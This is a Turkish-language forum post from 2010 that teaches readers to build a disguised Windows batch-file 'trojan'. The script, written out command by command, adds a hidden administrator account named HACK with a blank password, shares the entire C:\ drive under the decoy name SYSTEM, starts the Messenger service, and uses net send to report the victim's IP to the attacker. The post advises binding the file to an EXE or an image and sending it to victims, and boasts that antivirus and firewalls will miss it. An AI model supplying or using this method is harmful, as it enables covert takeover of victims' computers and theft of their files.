Trojanin ana amaci, adindan da anlasilacagi gibi hedef sisteme sizarak
ya ele gecirmek ya da bilgi toplamaktir. Dikkat edin zarar vermek
demiyorum cünkü bu etik olarak yanlis bir harekettir
Piyasada bu konuda son derece fonksiyonel bircok Trojan var fakat bu
trojanlari kodlayanlarin hepsi Ticari amac güttükleri icin ki bu konuda
da sonuna kadar haklidirlar, Trojanlarin Special Edition olan
versiyonlarinin disindaki tüm Public versiyonlari maalesef AV lerce
taninmakta ve hepsinden önemlisi Firewallar tarafindan bloke
edilmektedirler ve bu da kullanicilarin isini oldukca zorlastirmaktadir.
Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi
gerektirmektedir. Bu ikisinin disinda baska hicbir toola ihtiyaciniz
yoktur.
Simdi Trojanimizi hazirlamaya baslayalim;
1-) Öncelikle bir TXT dosyasi acin ve icine su komutu girin;
net user HACK /add
Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user
yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da
sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz;
2-) Simdi yukaridaki komutun hemen bir alt satirina gecin ve su komutu ekleyin;
net localgroup administrators HACK /add
Böylece "HACK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik "HACK" hesabimiz tüm yetkilere sahip.
3-) Simdi de kurbanimizin makinasindaki C:\ sürücüsünü sınırsız
paylasima acacagiz. Kurbani da huylandirmamak icin paylasim adini
SYSTEM olarak set edecegiz. Bunun icin asagidaki komutu kullanacagiz;
net share system=C:\ /unlimited
Ewet artik Kurbanimizin makinasini sonuna kadar actik. Peki kurbanin IP
sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK"
hesabindan baglanacagiz?
Bunun icin de kodumuza bir satirlik bir komut daha ekleyecegiz;
4-) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging
Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini
saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine
ekleyin;
net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan
Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.
4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz
gibi Windows Messenger Servisini kullanan internette ortalikta gezinen
bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled
'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut
satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi
Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de
Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son
önlemimizde de Manuel olan ve calismayan Messenger servisini
calistiracagiz.
Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve
oradan Messenger servisinin kod icerisinde kullanacagimiz adini
ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi
calistiriyoruz.
net start Messenger
Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle
ardisik sirada önce Messenger servisi calistirilacak daha sonra diger
islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı
ilk siraya koymaniz daha iyi olur.
Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir
isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile
birlestirin isterseniz kurbaniniza direk gönderin.
Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip
HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir.
C:\ sürücüsü de full olarak paylasima acilmis olacak ve son olarak da
IP si size gelecektir.
Artik IP sini de bildiginize göre, ister DOS komut satirina düserek
direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister
Essential Net Tools türünden bir program ile paylasima actirdiginiz C:\
sürücüsüne sizar istediginizi yaparsiniz.
Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun
bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile
hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin
olarak baglandiginiz icin hicbir personal firewall tarafindan
engellenmemesidir.
Alıntı DeqiLdir Kendi Emeğim...
Perş. Şub. 11, 2010 1:49 pm